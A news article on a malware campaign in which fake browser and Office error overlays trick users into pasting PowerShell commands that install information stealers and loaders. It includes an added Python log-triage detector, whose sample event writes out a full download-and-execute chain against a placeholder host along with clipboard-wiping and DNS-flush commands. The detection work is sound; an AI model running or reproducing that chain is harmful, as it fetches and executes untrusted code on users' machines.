
Fake Google Chrome error instructs users to run malicious PowerShell scripts

By Arun Maity | 3 min read

A recent malware campaign tricks users into running malicious PowerShell scripts through fake Google Chrome, Word, and OneDrive errors. The PowerShell “fixes” for the errors install malware on the target system.

Proofpoint researchers identified the new malware distribution campaign, which uses social engineering to get users to run PowerShell scripts that install malware. The researchers noted that the initial access broker TA571 and the ClearFake activity cluster used the method as early as March 1, 2024, and early April 2024, respectively. Both groups were observed using the technique in early June 2024.

ClearFake, a fake browser update activity cluster, injects malicious JavaScript and HTML into compromised legitimate websites. “In observed campaigns, when a user visited a compromised website, the injection caused the website to load a malicious script hosted on the blockchain via Binance’s Smart Chain contracts, a technique known as ‘EtherHiding’,” said Proofpoint.

An example of a ClearFake attack chain | Source: Proofpoint

The initial script then loaded a second script which, if it loaded and passed various checks, presented a fake warning overlay on the website. The warning instructed users to install a “root certificate” by copying a PowerShell command and pasting it into an administrator PowerShell terminal.

If the script is executed, it will perform several steps to confirm whether the device is a valid target and download additional payloads.

It flushes the DNS cache, clears the clipboard, displays a decoy message, and then downloads a second PowerShell script which performs anti-VM checks before downloading an information stealer.
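As an added defender-side example (not from the article or from Proofpoint), the following Python triages PowerShell script-block log events for the combination of steps described above: a DNS flush, a clipboard wipe, a decoy message and a download-and-execute stage. The regex patterns, the constructed sample events and the placeholder hosts are assumptions of this example, not indicators from the report.

```python
import re
# Behaviours the article attributes to the pasted "fix" script. The regexes are this
# example's assumption about how each step shows up in PowerShell 4104 script-block
# logs (Microsoft-Windows-PowerShell/Operational); they are not from the Proofpoint report.
BEHAVIOURS = {
    "dns_flush": [r"ipconfig(\.exe)?\s+/flushdns", r"Clear-DnsClientCache"],
    "clipboard_wipe": [r"Set-Clipboard\s+(-Value\s+)?(\$null|''|\"\")",
                       r"\[[\w.]*Clipboard\]::Clear\(\)", r"echo\s*\|\s*clip(\.exe)?"],
    "decoy_message": [r"Write-Host\s+['\"][^'\"]*(fix|update|certif)", r"MessageBox\]::Show\("],
    "download_exec": [r"(iwr|Invoke-WebRequest|curl)\b[^|;]*\|\s*(iex|Invoke-Expression)",
                      r"(iex|Invoke-Expression)\s*\(\s*(iwr|Invoke-WebRequest|New-Object\s+(System\.)?Net\.WebClient)",
                      r"DownloadString\([^)]*\)\s*\)?\s*\|\s*(iex|Invoke-Expression)"],
}

def matched_behaviours(script_block: str) -> set:
    """Names of the behaviours whose patterns appear in one script block."""
    return {name for name, pats in BEHAVIOURS.items()
            if any(re.search(p, script_block, re.IGNORECASE) for p in pats)}

def verdict(behaviours: set) -> str:
    """Download-and-execute alone is common in admin tooling; paired with the DNS
    flush, clipboard wipe or decoy message it matches the chain the article describes."""
    if "download_exec" not in behaviours:
        return "low"
    return "high" if len(behaviours) >= 3 else "medium"

def triage(events):
    """Return (RecordId, verdict, behaviours) for each 4104 event in a list of dicts."""
    out = []
    for ev in events:
        if ev.get("EventId") != 4104:
            continue  # only script-block events carry the pasted command text
        found = matched_behaviours(ev["ScriptBlockText"])
        out.append((ev["RecordId"], verdict(found), sorted(found)))
    return out

# Constructed sample events (not real telemetry); hosts are placeholders.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventId": 4104, "ScriptBlockText": "Get-Process | Sort-Object CPU -Descending"},
    {"RecordId": 2, "EventId": 4104, "ScriptBlockText": "ipconfig /flushdns; Clear-DnsClientCache"},
    {"RecordId": 3, "EventId": 4104, "ScriptBlockText": "iwr https://example.invalid/tool.ps1 -OutFile tool.ps1"},
    {"RecordId": 4, "EventId": 4104, "ScriptBlockText": (
        "ipconfig /flushdns; Set-Clipboard -Value $null; "
        "Write-Host 'Root certificate fix applied, please wait...'; "
        "iex (iwr -UseBasicParsing http://placeholder.invalid/stage2.ps1)")},
    {"RecordId": 5, "EventId": 4103, "ScriptBlockText": "not a script-block event"},
]
for record_id, level, found in triage(SAMPLE_EVENTS):
    print(f"record {record_id}: {level:6} {', '.join(found) or '-'}")
```

Script block logging (event ID 4104) has to be enabled for this telemetry to exist; the legitimate DNS-flush and download-only events in the sample stay at "low", while only the combined chain is rated "high".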

A separate activity cluster, which Proofpoint labeled ‘ClickFix’ in mid-April 2024, involved compromised sites containing an inject that loaded an iframe from pley[.]es.

A malicious fake warning overlay asking to copy-paste the code to PowerShell. | Source: Proofpoint

The iframe displayed an overlay message stating that a faulty browser update needed to be fixed. The steps that followed mirrored ClearFake’s technique: users were guided to run Windows PowerShell as an administrator and paste the code provided by the fake message.

Another, email-based, chain infects through HTML attachments that resemble Microsoft Word documents and instruct the user to install a “Word Online” extension to view the document. The error message offers “How to fix” and “Auto-fix” options, which use different methods to infect the target system.

Proofpoint noted payloads such as DarkGate, Matanbuchus, NetSupport, Amadey Loader, Lumma Stealer, XMRig, and a clipboard hijacker.

In all of these variants, the script was copied to the clipboard by browser-side JavaScript, a capability legitimate websites commonly use. While the fake-error social engineering is distinctive, the attack chain only succeeds if the user follows the steps; that is more likely when the instructions arrive in a notification impersonating a company such as Google or Microsoft.


Arun Maity


Arun Maity is a journalist from Kolkata who graduated from the Asian College of Journalism. He has an avid interest in music, videogames and anime. When he's not working, you can find him practicing and recording his drum covers, watching anime or playing games. You can contact him here: arunmaity23@proton.me
